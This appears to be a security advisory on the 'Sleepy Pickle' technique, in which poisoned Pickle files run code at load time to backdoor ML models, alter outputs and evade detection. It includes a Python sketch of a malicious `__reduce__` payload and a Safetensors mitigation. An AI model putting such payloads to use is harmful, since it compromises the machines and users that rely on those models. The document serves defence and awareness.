A recently disclosed attack technique known as “Sleepy Pickle” [1] poses a significant threat to machine learning models [2].
Description
The “Sleepy Pickle” attack targets machine learning models by exploiting the Pickle serialization format [2]. Pickle files can carry executable payloads, so an attacker who delivers a poisoned .pkl file can run arbitrary code the moment the victim deserializes it, corrupting the model and manipulating its behavior [2]. From there, the attacker can insert backdoors, control model outputs, tamper with processed data, and generate harmful output or misinformation, all while maintaining surreptitious access and evading detection [2]. This makes the technique a significant risk to any organization that relies on ML models. To mitigate the threat, organizations can adopt safer file formats such as Safetensors, which store only tensor data and therefore eliminate the risk of arbitrary code execution during deserialization [1]. Both points are illustrated in the sketches below.
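To illustrate the underlying weakness that Sleepy Pickle builds on, the following is a minimal sketch, assuming a hypothetical file name and a harmless stand-in payload: Pickle's `__reduce__` hook lets a serialized object name an arbitrary callable that the victim's interpreter invokes at load time. This is not the attack's actual injection tooling, only the deserialization behavior it abuses.

```python
import os
import pickle

class MaliciousPayload:
    # Pickle consults __reduce__ when serializing an object; the
    # (callable, args) tuple it returns is invoked on deserialization.
    def __reduce__(self):
        # Harmless stand-in command; an attacker could instead patch
        # model weights in memory or fetch a backdoor here.
        return (os.system, ("echo payload executed at load time",))

# Attacker side: write the poisoned file (hypothetical name).
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousPayload(), f)

# Victim side: merely loading the file runs the payload, before any
# model code is ever called.
with open("model.pkl", "rb") as f:
    pickle.load(f)
```

By contrast, Safetensors stores only raw tensor bytes and metadata, so there is no load-time hook for an attacker to hijack. A brief sketch using the safetensors library (the tensor name is illustrative):

```python
import torch
from safetensors.torch import save_file, load_file

# Only tensor data and metadata are written; no code objects.
weights = {"layer1.weight": torch.randn(4, 4)}
save_file(weights, "model.safetensors")

# Loading parses tensors directly; nothing executable is evaluated.
restored = load_file("model.safetensors")
```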
Conclusion
The “Sleepy Pickle” attack highlights the importance of securing machine learning models against malicious exploitation. Organizations must take proactive measures to protect their ML models from such attacks, including adopting safer serialization formats and hardening the pipelines that load model files from untrusted sources. As the use of machine learning continues to grow, it is crucial to stay vigilant and adapt to emerging threats in order to safeguard sensitive data and maintain the integrity of ML systems.
References
[1] https://www.darkreading.com/threat-intelligence/sleepy-pickle-exploit-subtly-poisons-ml-models
[2] https://vulners.com/thn/THN:78F0F730E5A25BE30885D013C8900B05